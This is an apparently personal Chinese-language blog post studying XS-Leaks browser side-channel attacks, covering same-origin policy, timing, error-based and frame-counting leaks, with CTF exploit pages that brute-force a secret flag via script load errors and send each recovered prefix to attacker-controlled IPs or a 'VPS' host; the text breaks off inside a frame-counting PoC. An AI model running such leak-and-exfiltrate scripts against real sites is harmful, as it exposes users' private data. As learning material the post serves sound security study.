<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Meteor_Kai">



    <meta name="description" content="Just Hack For Fun...">


    <meta name="keywords" content="Web exploits bring me great joy!">


<title>XS-Leaks学习 | Meteor_Kai</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        <!-- MathJax配置，可通过单美元符号书写行内公式等 -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
    });
</script>
<!-- 给MathJax元素添加has-jax class -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>
<!-- 通过连接CDN加载MathJax的js代码 -->
<script type="text/javascript" async
        src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML">
</script>


    


<meta name="generator" content="Hexo 7.3.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const pagebody = document.getElementsByTagName('body')[0]

            function setTheme(status) {

                if (status === 'dark') {
                    window.sessionStorage.theme = 'dark'
                    pagebody.classList.add('dark-theme');

                } else if (status === 'light') {
                    window.sessionStorage.theme = 'light'
                    pagebody.classList.remove('dark-theme');
                }
            };

            setTheme(window.sessionStorage.theme)
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Meteor_Kai&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                <a class="menu-item" href="/archives">Posts</a>
                
                <a class="menu-item" href="/categories">Categories</a>
                
                <a class="menu-item" href="/tags">Tags</a>
                
                <a class="menu-item" href="/about">About</a>
                
                <a class="menu-item" href="/links">Links</a>
                
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Meteor_Kai&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">
                    <svg class="menu-icon" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M4.5 17.27q-.213 0-.356-.145T4 16.768t.144-.356t.356-.143h15q.213 0 .356.144q.144.144.144.357t-.144.356t-.356.143zm0-4.77q-.213 0-.356-.144T4 11.999t.144-.356t.356-.143h15q.213 0 .356.144t.144.357t-.144.356t-.356.143zm0-4.77q-.213 0-.356-.143Q4 7.443 4 7.23t.144-.356t.356-.143h15q.213 0 .356.144T20 7.23t-.144.356t-.356.144z"/></svg>
                    <svg class="close-icon" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><!-- Icon from Material Symbols Light by Google - https://github.com/google/material-design-icons/blob/master/LICENSE --><path fill="currentColor" d="m12 12.708l-5.246 5.246q-.14.14-.344.15t-.364-.15t-.16-.354t.16-.354L11.292 12L6.046 6.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 11.292l5.246-5.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354L12.708 12l5.246 5.246q.14.14.15.345q.01.203-.15.363t-.354.16t-.354-.16z"/></svg>
                </div>
            </div>
            <div class="menu" id="mobile-menu">
                
                <a class="menu-item" href="/archives">Posts</a>
                
                <a class="menu-item" href="/categories">Categories</a>
                
                <a class="menu-item" href="/tags">Tags</a>
                
                <a class="menu-item" href="/about">About</a>
                
                <a class="menu-item" href="/links">Links</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if (toggleMenu.classList.contains("active")) {
            toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        } else {
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">XS-Leaks学习</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Meteor_Kai</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">April 7, 2025&nbsp;&nbsp;17:08:14</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p>XS-Leaks 全称 Cross-site leaks，可以用来 <strong>探测用户敏感信息</strong>。</p>
<p>设想网站存在一个模糊查找功能（若前缀匹配则返回对应结果）例如 <code>http://localhost/search?query=</code>，页面是存在 xss 漏洞，并且有一个类似 flag 的字符串，并且只有不同用户查询的结果集不同。这时你可能会尝试 csrf，但是由于网站正确配置了 CORS，导致无法通过 xss 结合 csrf 获取到具体的响应。这个时候就可以尝试 XS-Leaks。</p>
<p>XS-Leaks（或 Cross-Site Leaks）是一<a target="_blank" rel="noopener" href="https://xsleaks.dev/">组浏览器侧通道攻击</a>。它们使恶意网站能够从其他 Web 应用程序的用户那里推断数据。盲注也是一种侧信道攻击，可以这么理解。</p>
<p>在此之前，我们需要先了解一下同源政策，正是因为它的存在，XS-Leaks才有出现的必要。</p>
<h2 id="同源政策"><a href="#同源政策" class="headerlink" title="同源政策"></a>同源政策</h2><p><a target="_blank" rel="noopener" href="https://medium.com/starbugs/%E5%BC%84%E6%87%82%E5%90%8C%E6%BA%90%E6%94%BF%E7%AD%96-same-origin-policy-%E8%88%87%E8%B7%A8%E7%B6%B2%E5%9F%9F-cors-e2e5c1a53a19">https://medium.com/starbugs/%E5%BC%84%E6%87%82%E5%90%8C%E6%BA%90%E6%94%BF%E7%AD%96-same-origin-policy-%E8%88%87%E8%B7%A8%E7%B6%B2%E5%9F%9F-cors-e2e5c1a53a19</a></p>
<p>在开始之前，了解 SOP（Same Origin Policy）是很有帮助的，它是 Web 浏览器安全模型的核心和灵魂。这是一个或多或少说的规则：</p>
<p>同源政策是网站安全的基础。<a target="_blank" rel="noopener" href="https://domain-a.com/">https://domain-a.com</a>只能访问自己网站里的资源（图片、视频、节目码等），不允许网站<a target="_blank" rel="noopener" href="https://domain-b.com/">https://domain-b.com</a>来访问。想要访问跨源资源必须在某些特定情况下才被允许。</p>
<p>允许scheme、domain、port都可以被视为同源 (same-origin)</p>
<blockquote>
<p>若以 <a target="_blank" rel="noopener" href="https://domain-a.com:80/hannah-lin">https://domain-a.com:80/hannah-lin</a> 做范例，我们可以据此判断下列是否为同源</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http://domain-a.com → 不同源．scheme 不同</span><br><span class="line">https://domain-a.com/mike → 同源</span><br><span class="line">https://news.domain-a.com → 不同源．domain 不同</span><br><span class="line">https://domain-a.com:81 → 不同源．port 不同</span><br><span class="line">https://domain-b.com → 不同源．domain 不同</span><br></pre></td></tr></table></figure>
</blockquote>
<p>但是很多情况下网站明明就引入了很多跨来源的资源啊？</p>
<p>没错，在某些情况下跨来源是被允许的，不受同源限制策略！</p>
<ul>
<li><strong>跨来源嵌入通常被允许 ( embed )</strong></li>
</ul>
<p>像示例的<code>&lt;script src=”…”&gt;&lt;/script&gt;</code>、<code>&lt;link rel=”stylesheet” href=”…”&gt;</code>、<code>&lt;iframe&gt;</code>、图片<code>&lt;img&gt;</code>、<code>&lt;video&gt;</code>、 或者<code>@font-face</code> <code>&lt;object&gt;</code>、<code>&lt;embed&gt;</code>.等等都是跨来源嵌入。</p>
<ul>
<li><strong>跨来源写入通常被允许 ( writes )</strong></li>
</ul>
<p>可以在以太网上由<code>&lt;form&gt;</code>在<code>domain-a.com</code>发请求给<code>domain-b.com</code>，当然利用链接链接或直接重定向到其他网站也是允许的。</p>
<ul>
<li><strong>跨源读取通常被禁止 ( reads )</strong></li>
</ul>
<p><code>domain-a.com</code>无法读取<code>domain-b.com</code>cookie、XMLHttpRequest ，Fetch API 也无法被读取，会返回错误</p>
<p><img src="https://miro.medium.com/v2/resize:fit:875/1*BTtIADAmDXDACtlP0MkD4g.png" alt="img"></p>
<h2 id="通过定时攻击泄露"><a href="#通过定时攻击泄露" class="headerlink" title="通过定时攻击泄露"></a>通过定时攻击泄露</h2><p>浏览器可以轻松地对跨域请求进行计时。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> start = performance.<span class="title function_">now</span>()</span><br><span class="line"> </span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://example.com&#x27;</span>, &#123;</span><br><span class="line">  <span class="attr">mode</span>: <span class="string">&#x27;no-cors&#x27;</span>,</span><br><span class="line">  <span class="attr">credentials</span>: <span class="string">&#x27;include&#x27;</span>,</span><br><span class="line">&#125;).<span class="title function_">then</span>(<span class="function">() =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">var</span> time = performance.<span class="title function_">now</span>() - start</span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;The request took %d ms.&#x27;</span>, time)</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">#<span class="title class_">The</span> request took <span class="number">129</span> ms.</span><br></pre></td></tr></table></figure>

<p>这使得恶意网站可以区分响应。假设有一个搜索 API 供患者查找自己的记录。如果患者患有糖尿病并搜索“糖尿病”，则服务器返回数据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /api/v1/records/search?query=diabetes</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123; &#x27;records&#x27;: [&#123; &#x27;id&#x27;: 1, ... &#125;] &#125;</span><br></pre></td></tr></table></figure>

<p>如果患者没有糖尿病，API 会返回一个空的 JSON。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /api/v1/records/search?query=diabetes</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123; &#x27;records&#x27;: [] &#125;</span><br></pre></td></tr></table></figure>

<p>一般来说，前一个请求需要更长的时间。然后，攻击者可以创建一个恶意网站，对“diabetes” URL 的请求进行计时，并确定用户是否患有糖尿病。</p>
<h2 id="通过基于错误的攻击"><a href="#通过基于错误的攻击" class="headerlink" title="通过基于错误的攻击"></a>通过基于错误的攻击</h2><p>我们列表中的下一个侧通道是使用 JavaScript 策略性地捕获错误消息。假设一个页面根据一些敏感的用户数据返回<code>200 OK</code>或。<code>404 not found</code></p>
<p>然后，攻击者可以创建如下所示的页面，该页面查询应用程序并确定端点是否为浏览器用户返回错误。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">checkError</span>(<span class="params">url</span>) &#123;</span><br><span class="line">  <span class="keyword">let</span> script = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;script&#x27;</span>)</span><br><span class="line">  script.<span class="property">src</span> = url</span><br><span class="line">  script.<span class="property">onload</span> = <span class="function">() =&gt;</span> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[+] GET <span class="subst">$&#123;url&#125;</span> succeeded.`</span>)</span><br><span class="line">  script.<span class="property">onerror</span> = <span class="function">() =&gt;</span> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`[-] GET <span class="subst">$&#123;url&#125;</span> returned error.`</span>)</span><br><span class="line">  <span class="variable language_">document</span>.<span class="property">head</span>.<span class="title function_">appendChild</span>(script)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">checkError</span>(<span class="string">&#x27;https://www.example.com/&#x27;</span>)</span><br><span class="line"><span class="title function_">checkError</span>(<span class="string">&#x27;https://www.example.com/this-does-not-exist&#x27;</span>)</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[-] GET https://www.example.com/ succeeded.</span><br><span class="line">[+] GET https://www.example.com/this-does-not-exist returned error.</span><br></pre></td></tr></table></figure>



<p>个人认为这跟布尔盲注很像！</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;!<span class="variable constant_">DOCTYPE</span> html&gt;</span><br><span class="line">&lt;html lang=&quot;en&quot;&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;UTF-8&quot;&gt;</span><br><span class="line">    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;</span><br><span class="line">    &lt;title&gt;Error-Based Attack&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;script&gt;</span><br><span class="line">    function checkError(url) &#123;</span><br><span class="line">        let script = document.createElement(&#x27;script&#x27;)</span><br><span class="line">        script.src = url</span><br><span class="line">        script.onload = () =&gt; window.open(&quot;http://101.43.48.199:8000/1&quot;);</span><br><span class="line">        script.onerror = () =&gt; window.open(&quot;http://101.43.48.199:8000/2&quot;);</span><br><span class="line">        document.head.appendChild(script)</span><br><span class="line">      &#125;</span><br><span class="line">       </span><br><span class="line">      checkError(&#x27;http://0.0.0.0:8000/internal/search?s=nctf&#123;&#x27;)</span><br><span class="line">      checkError(&#x27;http://0.0.0.0:8000/internal/search?s=somethingwrong&#x27;)</span><br><span class="line">    &lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>接下来给出一个相关exp：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line">&lt;!<span class="variable constant_">DOCTYPE</span> html&gt;</span><br><span class="line">&lt;html lang=&quot;en&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;UTF-8&quot;&gt;</span><br><span class="line">    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;</span><br><span class="line">    &lt;title&gt;Error-Based Attack&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;script&gt;</span><br><span class="line">        let currentFlag = &quot;nctf&#123;&quot;;</span><br><span class="line">        const chars = &quot;abcdef0123456789-&#123;&#125;&quot;;</span><br><span class="line"></span><br><span class="line">        function sleep(ms) &#123;</span><br><span class="line">            return new Promise(resolve =&gt; setTimeout(resolve, ms));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        function checkCharacter(char) &#123;</span><br><span class="line">            return new Promise((resolve) =&gt; &#123;</span><br><span class="line">                let script = document.createElement(&#x27;script&#x27;);</span><br><span class="line">                script.src = `http://0.0.0.0:8000/internal/search?s=$&#123;currentFlag&#125;$&#123;char&#125;`;</span><br><span class="line"></span><br><span class="line">                script.onload = () =&gt; &#123;</span><br><span class="line">                    document.head.removeChild(script);</span><br><span class="line">                    resolve(true);</span><br><span class="line">                &#125;;</span><br><span class="line"></span><br><span class="line">                script.onerror = () =&gt; &#123;</span><br><span class="line">                    document.head.removeChild(script);</span><br><span class="line">                    resolve(false);</span><br><span class="line">                &#125;;</span><br><span class="line"></span><br><span class="line">                document.head.appendChild(script);</span><br><span class="line">            &#125;);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        async function bruteforce() &#123;</span><br><span class="line">            try &#123;</span><br><span class="line">                while (!currentFlag.endsWith(&#x27;&#125;&#x27;)) &#123;</span><br><span class="line">                    for (let char of chars) &#123;</span><br><span class="line">                        const isCorrect = await checkCharacter(char);</span><br><span class="line">                        if (isCorrect) &#123;</span><br><span class="line">                            currentFlag += char;</span><br><span class="line">                            window.open(`http://VPS:8000/?flag=$&#123;currentFlag&#125;`);</span><br><span class="line">                            await sleep(50);</span><br><span class="line">                            break;</span><br><span class="line">                        &#125;</span><br><span class="line">                        await sleep(50);</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125; catch (error) &#123;</span><br><span class="line">                window.open(`http://VPS:8000/?error=$&#123;currentFlag&#125;`);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        bruteforce();</span><br><span class="line">    &lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line"></span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>再来一个：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">	<span class="keyword">function</span> <span class="title function_">probeError</span>(<span class="params">flag</span>) &#123;</span><br><span class="line">		<span class="keyword">let</span> url = <span class="string">&#x27;http://127.0.0.1:8000/internal/search?s=&#x27;</span> + flag;</span><br><span class="line">		<span class="keyword">let</span> script = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;script&#x27;</span>);</span><br><span class="line">		script.<span class="property">src</span> = url;</span><br><span class="line">		script.<span class="property">onload</span> = <span class="function">() =&gt;</span> &#123;</span><br><span class="line">			<span class="title function_">fetch</span>(<span class="string">&#x27;http://156.238.233.113:8000/?flag=&#x27;</span> + flag, &#123; <span class="attr">mode</span>:<span class="string">&#x27;no-cors&#x27;</span> &#125;);</span><br><span class="line">			<span class="title function_">leak</span>(flag);</span><br><span class="line">			script.<span class="title function_">remove</span>();</span><br><span class="line">		&#125;;</span><br><span class="line">		script.<span class="property">onerror</span> = <span class="function">() =&gt;</span> script.<span class="title function_">remove</span>();</span><br><span class="line">		<span class="variable language_">document</span>.<span class="property">head</span>.<span class="title function_">appendChild</span>(script);</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">let</span> dicts = <span class="string">&#x27;abcdefghijklmnopqrstuvwxyz0123456789-&#123;&#125;&#x27;</span>;</span><br><span class="line">	<span class="keyword">function</span> <span class="title function_">leak</span>(<span class="params">flag</span>) &#123;</span><br><span class="line">		<span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; dicts.<span class="property">length</span>; i++) &#123;</span><br><span class="line">			<span class="keyword">let</span> char = dicts[i];</span><br><span class="line">			<span class="title function_">probeError</span>(flag + char);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="title function_">leak</span>(<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>



<h2 id="通过帧计数泄露"><a href="#通过帧计数泄露" class="headerlink" title="通过帧计数泄露"></a>通过帧计数泄露</h2><p><a target="_blank" rel="noopener" href="https://xsleaks.dev/docs/attacks/frame-counting/">https://xsleaks.dev/docs/attacks/frame-counting/</a></p>
<p>通过获取帧的句柄，可以访问该帧的window.length属性，该属性用于检索窗口中的帧数（IFRAME 或 FRAME）。</p>
<p>这种知识有时会产生安全&#x2F;隐私影响。例如，网站可能会根据某些用户数据以不同的帧数呈现个人资料页面。</p>
<p>有几种方法可以获得窗口句柄。第一个是调用window.open，它返回句柄。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> win = <span class="variable language_">window</span>.<span class="title function_">open</span>(<span class="string">&#x27;https://example.com&#x27;</span>)</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;Waiting 3 seconds for page to load...&#x27;</span>)</span><br><span class="line"><span class="built_in">setTimeout</span>(<span class="function">() =&gt;</span> &#123;</span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;%d FRAME/IFRAME elements detected.&#x27;</span>, win.<span class="property">length</span>)</span><br><span class="line">&#125;, <span class="number">3000</span>)</span><br></pre></td></tr></table></figure>

<p>另一种是对目标网站进行框架，并获取框架的句柄。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe name=<span class="string">&quot;framecounter&quot;</span> src=<span class="string">&quot;https://www.example.com&quot;</span>&gt;&lt;/iframe&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span></span><br><span class="line"><span class="language-javascript"><span class="language-xml">  <span class="keyword">var</span> win = <span class="variable language_">window</span>.<span class="property">frames</span>.<span class="property">framecounter</span></span></span></span><br><span class="line"><span class="language-javascript"><span class="language-xml"> </span></span></span><br><span class="line"><span class="language-javascript"><span class="language-xml">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;Waiting 3 seconds for page to load...&#x27;</span>)</span></span></span><br><span class="line"><span class="language-javascript"><span class="language-xml">  <span class="built_in">setTimeout</span>(<span class="function">() =&gt;</span> &#123;</span></span></span><br><span class="line"><span class="language-javascript"><span class="language-xml">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;%d FRAME/IFRAME elements detected.&#x27;</span>, win.<span class="property">length</span>)</span></span></span><br><span class="line"><span class="language-javascript"><span class="language-xml">  &#125;, <span class="number">3000</span>)</span></span></span><br><span class="line"><span class="language-javascript"><span class="language-xml"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br></pre></td></tr></table></figure>



<p>这里给出相关比赛的poc</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// contentWindow.frames.length</span></span><br><span class="line"> </span><br><span class="line"><span class="keyword">var</span> chars = <span class="string">&#x27;0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!&quot;#$%&amp;\&#x27;()*+,-./:;&lt;=&gt;?@[\\]^`&#123;|&#125;~ &#x27;</span>;</span><br><span class="line"><span class="keyword">var</span> charLen = chars.<span class="property">length</span>;</span><br><span class="line"><span class="keyword">var</span> <span class="variable constant_">ENDPOINT</span> = <span class="string">&quot;http://challenges.fbctf.com:8082/search?query=&quot;</span></span><br><span class="line"><span class="keyword">var</span> x = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;iframe&#x27;</span>);</span><br><span class="line"> </span><br><span class="line"><span class="keyword">function</span> <span class="title function_">search</span>(<span class="params">leak, charCounter</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> curChar = chars[charCounter];</span><br><span class="line">    </span><br><span class="line">    <span class="comment">//Chek if the character is valid</span></span><br><span class="line">    x.<span class="title function_">setAttribute</span>(<span class="string">&quot;src&quot;</span>, <span class="string">&#x27;http://challenges.fbctf.com:8082/search?query=&#x27;</span> + leak + curChar);</span><br><span 